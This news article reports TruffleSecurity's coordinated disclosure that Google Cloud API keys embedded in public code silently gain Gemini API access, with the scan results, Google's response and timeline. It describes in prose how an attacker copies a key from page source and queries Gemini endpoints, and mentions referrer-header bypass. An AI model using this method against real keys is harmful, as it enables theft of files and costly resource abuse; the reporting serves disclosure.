Researchers at TruffleSecurity published findings showing that Google Cloud API keys - credentials Google has explicitly told developers are safe to embed in public code for years - can now silently authenticate with the Gemini AI API, exposing uploaded files, cached data, and billable AI resources to anyone who finds them. The disclosure, published on February 26, 2026, followed a 90-day coordinated process during which Google initially dismissed the report before eventually acknowledging it and beginning remediation.
The research reached a wide audience quickly. Security researcher John Hammond, whose YouTube channel has 2.12 million subscribers, covered the findings on the same day, drawing more than 82,000 views within 72 hours. The core message landed simply: what was documented as safe to share is no longer safe, and almost nobody noticed the change.
The problem is not that developers made a mistake. It is that Google changed the rules without telling anyone.
What Google's own documentation said
To understand the exposure, it helps to start with what Google instructed developers to do. The Maps JavaScript API documentation directs developers to create an API key and then embed its alphanumeric string directly in the HTML of a web page. The relevant code sample places the key inside a <script> tag loaded from maps.googleapis.com - visible in any browser's page source. Google's documentation states: "Remember to restrict the API key before using it in production," but the default key created through the Google Cloud console is set to unrestricted, meaning it is immediately valid for every enabled API in the project.
The Firebase security checklist, last updated February 26, 2026 - the same day as the public disclosure - states under the heading "Understand API keys": "API keys for Firebase services are not secret. Firebase uses API keys only to identify your app's Firebase project to Firebase services, and not to control access to database or Cloud Storage data." The checklist instructs developers that they "can safely embed them in client code."
Those instructions were accurate when written. Google Cloud API keys were designed as project identifiers for billing, not as authentication credentials in the traditional sense. A Maps key sitting in public JavaScript posed no meaningful security risk under the old architecture. Then Gemini arrived. And, according to TruffleSecurity's blog post, published February 25, 2026: "No warning. No confirmation dialog. No email notification."
How the privilege escalation works
When a developer enables the Gemini API - formally listed as the Generative Language API - on a Google Cloud project, every existing API key associated with that project silently gains the ability to authenticate with Gemini endpoints. The key itself does not change. Its alphanumeric string, beginning with AIza, remains identical. What changes is what Google's backend accepts it for.
According to TruffleSecurity, this creates two distinct problems. The first is retroactive privilege expansion: a Maps key created three years ago, embedded in a website's source code exactly as Google instructed, becomes a Gemini credential the moment a developer on the same team enables the Gemini API for an internal prototype. The second is insecure defaults: a newly created Google Cloud API key defaults to "Unrestricted," making it immediately valid for every enabled API in the project, including Gemini.
The attack requires minimal skill. An attacker visits a website, opens the browser's developer tools, copies the AIza key from the Maps embed, and runs a single curl command against the Gemini API's /files endpoint. According to TruffleSecurity, instead of a 403 Forbidden response, the attacker receives a 200 OK. From there, the attacker can access any files or cached content the project owner has stored through the Gemini API, exhaust quotas to shut down legitimate services, or run up AI inference charges. "Depending on the model and context window, a threat actor maxing out API calls could generate thousands of dollars in charges per day on a single victim account," according to Truffle Security.
A commenter on John Hammond's YouTube video cited a Reddit post describing "$82,000 in 48 hours from a stolen Gemini API key" by a developer whose monthly usage was $180. The researchers note that an attacker never needs to touch the target's infrastructure - the key is included in the public webpage, right where Google's documentation said to put it.
The vulnerability maps to two weakness categories: CWE-1188 (insecure default initialization) and CWE-269 (incorrect privilege assignment). A developer creating a key for a map widget is unknowingly generating a credential capable of accessing sensitive AI endpoints, because the default configuration permits access to every enabled API in the project.
A separate concern raised during community discussion is that application-level "site restrictions" on these keys can be bypassed by adjusting the HTTP referrer header on a request - a limitation reportedly raised with Google in 2024 and closed without a fix.
The scale: 2,863 live keys in a single crawl
To measure the scope of exposure, TruffleSecurity scanned the November 2025 Common Crawl dataset - a publicly available archive of approximately 700 terabytes of web content covering 2.29 billion pages. The scan returned 2,863 live Google API keys vulnerable to this privilege escalation vector.
These were not hobby projects. According to TruffleSecurity, victims included major financial institutions, security companies, global recruiting firms, and - notably - Google itself. The researchers provided Google with concrete examples from its own infrastructure during the disclosure process. One key had been embedded in the page source of a Google product's public-facing website since at least February 2023, confirmed through the Internet Archive. There was no client-side logic on the page attempting to access any generative AI endpoints - it was used solely as a public project identifier, standard practice for Google services. TruffleSecurity tested the key by hitting the Gemini API's /modelsendpoint and received a 200 OK response listing available models. A key deployed years ago for a completely benign purpose had silently gained full access to a sensitive API without any developer intervention.
The mobile application surface is larger still. Quokka, a mobile security firm, published a complementary report on February 27, 2026. A scan of 250,000 apps in Quokka's database found that 39.5 percent contained hardcoded Google API keys, returning more than 35,000 unique keys in total. Android applications can be decompiled using freely available open-source tools, and extracting a hardcoded key from decompiled code requires little more than a regular expression pattern match followed by a single API call.
A difficult disclosure
The path from discovery to public acknowledgment was not straightforward. TruffleSecurity submitted the report to Google's Vulnerability Disclosure Program on November 21, 2025. Four days later, Google determined the behavior was "intended" and dismissed the report.
The researchers pushed back. On December 1, 2025, after providing concrete examples from Google's own infrastructure - including keys on Google product websites - the issue gained internal traction. The following day, December 2, Google reclassified the report from "Customer Issue" to "Bug," upgraded its severity, and confirmed the product team was evaluating a fix. Google requested the full list of 2,863 exposed keys, which TruffleSecurity provided.
By December 12, 2025, Google shared a remediation plan, confirming an internal pipeline to discover leaked keys, beginning to restrict exposed keys from accessing the Gemini API, and committing to address the root cause before the public disclosure date. On January 13, 2026, Google formally classified the vulnerability as "Single-Service Privilege Escalation, READ" - Tier 1. On February 2, 2026, Google confirmed the team was still working on the root-cause fix. The 90-day disclosure window ended on February 19, 2026. Public disclosure followed on February 25-26.
TruffleSecurity was measured in its assessment of Google's response: "Building software at Google's scale is extraordinarily difficult, and the Gemini API inherited a key management architecture built for a different era. Google recognized the problem we reported and took meaningful steps." The researchers noted that getting the report initially taken seriously required demonstrating that Google's own infrastructure was affected - a detail John Hammond described in his video: "We provided Google with concrete examples from their own infrastructure. I'm not poking fun, but this is kind of a cool way to really demonstrate impact."
TruffleHog: scanning for the exposure
TruffleSecurity is the company behind TruffleHog, an open-source credential scanning tool released under an AGPL-3.0 license. As of the disclosure date, the GitHub repository had accumulated more than 24,800 stars, over 2,200 forks, 183 contributors, and 322 releases. The tool classifies over 800 secret types and supports active verification - it attempts to authenticate using discovered credentials to confirm whether they are live, returning one of three statuses: verified, unverified, or unknown.
TruffleHog can scan Git repositories, GitHub organizations, GitLab instances, Docker images, S3 buckets, Google Cloud Storage, Elasticsearch clusters, Postman workspaces, Jenkins servers, Confluence, Jira, Slack, filesystems, and more. For this specific exposure, TruffleSecurity recommends running:
trufflehog filesystem /path/to/your/code --only-verified
This scans local code for live, verified Google API keys and confirms whether any have Gemini access. The tool integrates into CI/CD pipelines via GitHub Actions and GitLab CI, and supports a pre-commit hook that prevents credentials from being committed to repositories in the first place. Joe Leon, the TruffleSecurity researcher who led the investigation, also published a 15-minute webinar explaining the technical details. The repository's go.mod and go.sum files were updated to Google API version v0.259.0 approximately one week before the public disclosure, reflecting active maintenance of the detection logic directly tied to this research.
TruffleHog's verification step is what distinguishes it from simple pattern-matching scanners. Rather than flagging any string that resembles an AIza key, it tests each key against the Gemini API to confirm whether it can authenticate - producing a list of live, exposed credentials rather than a list of candidates that may or may not be active.
Why marketing and advertising teams are affected
The exposure has direct implications for marketing and advertising technology organizations, which have built deep integrations with the exact Google services at the center of this issue. Teams using Google Maps to display store locations, Firebase for app analytics and A/B testing, or YouTube for video embeds followed integration documentation that explicitly treated API keys as non-sensitive. If any of those Google Cloud projects subsequently had the Gemini API enabled - by a developer testing an AI feature, exploring an integration, or following a product tutorial - the keys already deployed in production client-side code may now carry Gemini access that nobody authorized.
Google's $425.7 million privacy verdict in September 2025, in which a jury found that Firebase SDK continued collecting user data after users disabled tracking, demonstrated that credential and SDK architecture decisions carry legal and financial weight far beyond technical departments. Firebase SDK is deployed in approximately 97 percent of the top thousand Android applications according to trial testimony in that case - the same SDK ecosystem that now intersects with the Gemini API key exposure.
Google's real-time bidding practices faced a formal FTC complaint in January 2025 alleging exposure of sensitive data to foreign adversaries, with the complaint noting Google's RTB system operates across 35.4 million websites and 91 percent of Android apps. The API key vulnerability sits within the same broader pattern of credential infrastructure questions that have shadowed Google's expanding platform reach.
The Gemini API operates at substantial and growing scale. Alphabet reported in February 2026 that Gemini processes over 10 billion tokens per minute via direct API use, with the Gemini App reaching 750 million monthly active users. Google's advertising infrastructure now relies on Gemini across fraud detection, campaign optimization, image generation, and search products - meaning the pool of Google Cloud projects with the Generative Language API enabled, and therefore the number of legacy API keys that have quietly gained elevated permissions, is large and still growing.
Quokka frames the structural challenge plainly: "As AI capabilities get bolted onto existing platforms at speed, legacy credential architectures are being asked to do jobs they were never designed for. Keys that were safe under one set of platform capabilities become sensitive under another, and the gap between a platform's security posture and developers' understanding of it can widen faster than anyone notices."
What Google says it has changed
Google outlined three remediation commitments in its public statement. New keys created through AI Studio will default to Gemini-only scope, preventing the cross-service access that created the original exposure. Leaked keys discovered in the wild will be blocked from accessing the Gemini API. And Google plans to send proactive notifications to developers when exposed keys are detected.
TruffleSecurity described these as "meaningful improvements" while noting open questions remain - in particular, whether Google will retroactively audit all existing impacted keys and notify project owners who may be unknowingly exposed. "Honestly, that is a monumental task," the researchers acknowledged.
Notably, the Firebase security checklist updated on the day of public disclosure still carries the statement that API keys for Firebase services "are not secret" and "can safely embed them in client code." It does not yet contain a caveat for projects with Gemini enabled. The Maps JavaScript API documentation, last updated February 27, 2026, does not reference the Gemini access risk. The documentation that led to the exposure remains largely unchanged.
Timeline
- February 2023 - A Google product's public-facing website embeds an API key in accessible page source. The key remains publicly visible for over three years.
- November 2025 - TruffleSecurity scans the November 2025 Common Crawl dataset (~700 TiB, 2.29 billion pages) and identifies 2,863 live vulnerable Google API keys.
- November 21, 2025 - TruffleSecurity submits the report to Google's Vulnerability Disclosure Program.
- November 25, 2025 - Google initially determines the behavior is "intended" and dismisses the report. TruffleSecurity pushes back.
- December 1, 2025 - After TruffleSecurity provides examples from Google's own infrastructure, the issue gains internal traction.
- December 2, 2025 - Google reclassifies the report from "Customer Issue" to "Bug," upgrades severity, and requests the full list of 2,863 exposed keys. Gemini was by then deployed across Google's advertising fraud detection systems.
- December 12, 2025 - Google shares its remediation plan, confirms internal pipeline for leaked key detection, and commits to address root cause before disclosure.
- January 13, 2026 - Google classifies the vulnerability as "Single-Service Privilege Escalation, READ" - Tier 1.
- February 2, 2026 - Google confirms the root-cause fix is still in progress.
- February 19, 2026 - TruffleSecurity's 90-day disclosure window ends.
- February 25, 2026 - TruffleSecurity publishes its full blog post: "Google API Keys Weren't Secrets. But then Gemini Changed the Rules."
- February 26, 2026 - BleepingComputer publishes coverage. John Hammond's YouTube video reaches 82,000+ views within 72 hours. Firebase security checklist updated - same day as disclosure. Google's Gemini App had reached 750 million monthly active users by this date.
- February 27, 2026 - Quokka publishes mobile findings: 39.5 percent of 250,000 scanned apps contain hardcoded Google API keys, totalling more than 35,000 unique keys. Maps JavaScript API documentation last updated.
Summary
Who: TruffleSecurity researcher Joe Leon discovered and disclosed the vulnerability after scanning public web data. John Hammond amplified the findings to a broad technical audience. Quokka published complementary mobile research. Google is the platform whose credential architecture created the exposure. Affected organizations span financial institutions, security companies, recruiting firms, and Google itself.
What: Google Cloud API keys - beginning with AIza, long documented as safe to embed in public client-side code - can now authenticate with the Gemini AI API when the Generative Language API is enabled on the associated Google Cloud project. TruffleSecurity found 2,863 live vulnerable keys in a single public web crawl covering 2.29 billion pages. Quokka found more than 35,000 unique exposed keys across 250,000 mobile apps. An attacker needs only to copy a key from a webpage and run a single curl command to gain access.
When: TruffleSecurity notified Google on November 21, 2025. Google initially dismissed the report on November 25 before reclassifying it as a bug on December 2. Google formally classified the vulnerability on January 13, 2026. Public disclosure followed on February 25-26, 2026, after the 90-day window closed on February 19.
Where: Exposed keys appear in publicly accessible JavaScript on websites, in decompiled Android application packages available via app stores, and in public code repositories. The risk is global, affecting any Google Cloud project with the Generative Language API enabled whose API keys appear in client-side code.
Why: Google spent over a decade explicitly instructing developers to treat API keys as non-sensitive project identifiers safe for public embedding. When the Generative Language API was enabled on Google Cloud projects, existing keys silently gained access to Gemini endpoints with no notification to developers. The insecure default configuration - unrestricted keys valid for all enabled APIs - combined with retroactive privilege expansion created an exposure that neither developers nor the organizations using their code anticipated.